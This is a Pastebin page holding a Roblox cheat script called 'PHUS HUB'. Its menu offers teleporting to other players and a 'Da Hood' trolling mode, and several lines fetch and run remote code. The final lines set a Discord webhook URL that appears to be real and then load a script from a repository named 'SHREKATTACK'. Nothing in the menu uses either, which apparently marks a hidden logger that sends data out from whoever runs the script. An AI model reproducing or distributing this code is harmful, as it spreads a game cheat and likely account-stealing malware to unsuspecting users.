Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
- local Window = Library.CreateLib("PHUS HUB", "BloodTheme")
- local Tab = Window:NewTab("TP to Players")
- local Section = Tab:NewSection("Teleport to Players")
- Plr = {}
- for i,v in pairs(game:GetService("Players"):GetChildren()) do
- table.insert(Plr,v.Name)
- end
- local drop = Section:NewDropdown("Select Player!", "Click To Select", Plr, function(t)
- PlayerTP = t
- end)
- Section:NewButton("Click To TP", "", function()
- game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
- end)
- Section:NewButton("Refresh Player","Refresh Player", function()
- drop:clear()
- for i,v in pairs(game:GetService("Players"):GetChildren()) do
- table.insert(Plr,v.Name)
- end
- end)
- Section:NewKeybind("TP Keybinds", "tp keybinds", Enum.KeyCode.Q, function()
- game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players[PlayerTP].Character.HumanoidRootPart.CFrame
- end)
- local Section = Tab:NewSection("Da Hood trolling Only")
- Section:NewButton("Da Hood Trolling", "", function()
- --[[
- YOU NEED BOOMBOX FOR THE SOUNDS TO WORK
- AND YOU NEED GODV3 FOR THE SOUNDS TO BE FE GET IT AT #>godv3 AT DISCORD.GG/NOVAGUI
- Controls:
- X - Go invis
- B - Jumpscare
- H - Jumpscare Mouse
- C - Play humming sound
- V - Play footsteps sound
- Z - Play Scary Music
- T - Walk Thingy (TURNED OFF ATM WILL UPDATE IN FUTURE)
- J - Attacks While In Mimic
- Q - Scary Laugh
- Do "/e mimic" to wear a mask use mimic anims and go titan mode (must be fat to use titan mode)
- Give suggestions on what to add at discord.gg/novagui
- Made by Icxy#0001
- ]]
- -- this picks a random jumpscare sound when u Jumpscare Someone
- -- get some jumpscares here: https://www.roblox.com/develop/library?CatalogContext=2&Keyword=jumpscare&SortAggregation=5&LegendExpanded=true&Category=9
- getgenv().JumpscareSound = {
- "8280196339", -- put audios in like this for a random jumpscare sound
- "7588947168" -- make sure to not put a "," on the last id
- }
- getgenv().Settings = {
- ['HoverAnims'] = 'On', --[On / Off]
- ['DaMimicSpeed'] = '100', -- MUST BE A NUMBER
- }
- loadstring(game:HttpGet("https://icxy.xyz/NovaGui/NovaMimic", true))()
- local TabN2 = Window:NewTab("Control")
- local SectionN2 = TabN2:NewSection("Control Da Mimic")
- SectionN2:NewButton("X - Go invis", "", function()
- end)
- SectionN2:NewButton("B - Jumpscare", "NEED BOOMBOX", function()
- end)
- SectionN2:NewButton("H - Jumpscare Mouse", "NEED BOOMBOX", function()
- end)
- SectionN2:NewButton("C - Play humming sound", "NEED BOOMBOX", function()
- end)
- SectionN2:NewButton("V - Play footsteps sound", "NEED BOOMBOX", function()
- end)
- SectionN2:NewButton("Z - Play Scary Music", "NEED BOOMBOX", function()
- end)
- SectionN2:NewButton("T - Walk Thingy (TURNED OFF ATM WILL UPDATE IN FUTURE)", "", function()
- end)
- SectionN2:NewButton("J - Attacks While In Mimic", "", function()
- end)
- SectionN2:NewButton("Q - Scary Laugh", "NEED BOOMBOX", function()
- end)
- end)
- local Tab3 = Window:NewTab("Setting")
- local s3 = Tab3:NewSection("GuiSetting")
- s3:NewKeybind("ToggleGui", "ToggleGui", Enum.KeyCode.M, function()
- Library:ToggleUI()
- end)
- _G.webhooksdiscord = "https://discordapp.com/api/webhooks/989148064113635338/sCR-4ZdpL_9Hb3wwu0NwMfShLfHww5L9uMYgGShVwvO1mcq4F9yCeJTIqWqs4WbkB4QD"
- loadstring(game:HttpGet("https://raw.githubusercontent.com/SHARKX516/SHREKATTACK/main/SHARKLOL2.lua"),true)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement